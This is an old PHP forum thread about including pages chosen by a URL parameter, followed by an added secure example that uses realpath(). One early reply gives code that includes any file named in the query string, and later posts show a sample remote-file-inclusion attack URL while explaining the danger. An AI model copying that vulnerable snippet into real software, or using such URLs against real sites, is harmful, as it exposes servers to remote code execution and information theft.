newbie's question

scorpio2002
Forum Newbie
Posts: 2
Joined: Tue May 31, 2005 9:00 am

Post by scorpio2002 »

Hi there!
I'm new to php and I've recently learnt to use "include" to include a file in my php page. Now I'd like to be able to achieve more.

I'd like "include" to work with variables. For example... If I type " http://www.mypage.it/index?=credits.html " I'd like the include command to include the page credits.html.
If I'm not mistaken, the following site uses something like that: http://www.baslug.org/index.php

Is that possible?
Thank you in advance.

Donato

p.s.: sorry for my English...
Skara
Forum Regular
Posts: 703
Joined: Sat Mar 12, 2005 7:13 pm
Location: US

Post by Skara »

wrong forum. Use this instead:
http://example.com/?file=example.html
then,

Code: Select all

if (file_exists($_GET['file'])) include $_GET['file'];
else print("File not found.");
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Do not use that code

It can introduce serious security problems. Make sure that the filename is in an allowed directory.
scorpio2002
Forum Newbie
Posts: 2
Joined: Tue May 31, 2005 9:00 am

Post by scorpio2002 »

Do not use that code
ehm.. could you be clearer? What's the security issue with this code? And so, what should I use to achieve what I want? :D

Thank you in advance :P
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto

Post by John Cartwright »

I tend to create an array of accepted pages.

Code: Select all

$valid = array('home','news','forums');
And when calling a page I see whether or not it exists in the page.
If it exists, then the page call is valid, if not, redirect them somewhere else, such as a 404 page.
You should also make sure the page exists, just because that's common sense :)

Code: Select all

//make sure $page has a value, if not assign it a default
$page = !empty($_GET['page']) ? $_GET['page'] : 'home';
if (in_array($page,$valid) && file_exists($page.'.php'))
{
     include($page.'.php');
}
else
{
     include('404.html');
}

Without doing this check, you could potentially load a PHP script from another server, and it could 1) bring down your site and possibly server 2) gather important information about your site

An example of this attack would be http://www.domain.com/?page=http://badd ... script.php
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

:arrow: Moved to PHP Code :?
Skara
Forum Regular
Posts: 703
Joined: Sat Mar 12, 2005 7:13 pm
Location: US

Post by Skara »

Ambush Commander wrote: Do not use that code

It can introduce serious security problems. Make sure that the filename is in an allowed directory.
Of course. But as he's a newb, I doubt he's designing some high-profile site or anything. ;)
CoderGoblin
DevNet Resident
Posts: 1425
Joined: Tue Mar 16, 2004 10:03 am
Location: Aachen, Germany

Post by CoderGoblin »

Skara wrote: Of course. But as he's a newb, I doubt he's designing some high-profile site or anything. ;)
Better to learn how to do things correctly from the start though. If you program well while learning it will become instinctive.
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

I've found http://www.php.net/realpath to be very useful to determine if the file is really in the wanted directory....
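
The "allowed directory" check and the realpath() suggestion from the replies above, as an added example that is not code from any poster in this thread. The function name resolve_page, the demo directory layout and the sample request values are assumptions constructed for illustration.

```php
<?php
// Added example: map a requested page name to a file inside $baseDir,
// or return null. resolve_page() and the directory names are hypothetical.
function resolve_page(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // the base directory itself is missing
    }
    // Prefixing the base directory means a URL in $requested is treated as a
    // (nonexistent) local path. realpath() returns false for paths that do
    // not exist and collapses "..", "." and symlinks for paths that do.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare against the base WITH a trailing separator, so that a sibling
    // such as .../pages_old is not accepted as being inside .../pages.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed demo tree in the system temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'incdemo_' . getmypid();
@mkdir("$root/pages", 0700, true);
@mkdir("$root/pages_old", 0700, true);
file_put_contents("$root/pages/home.php", "home page\n");
file_put_contents("$root/secret.php", "not for visitors\n");
file_put_contents("$root/pages_old/old.php", "old page\n");

// Constructed request values, as they might arrive in $_GET['page'].
$samples = ['home', '../secret', '../pages_old/old', 'missing',
            'http://remote.invalid/script'];
foreach ($samples as $page) {
    $path = resolve_page("$root/pages", $page);
    // Only 'home' resolves to a file under pages/; a real front controller
    // would include($path) in that case and serve 404.html otherwise.
    printf("%-30s => %s\n", $page, $path === null ? 'rejected (404)' : 'include');
}
```

The comparison runs on the resolved path, never on the raw request string, which is what makes it hold up against `..` segments and symlinks that a plain file_exists() test lets through.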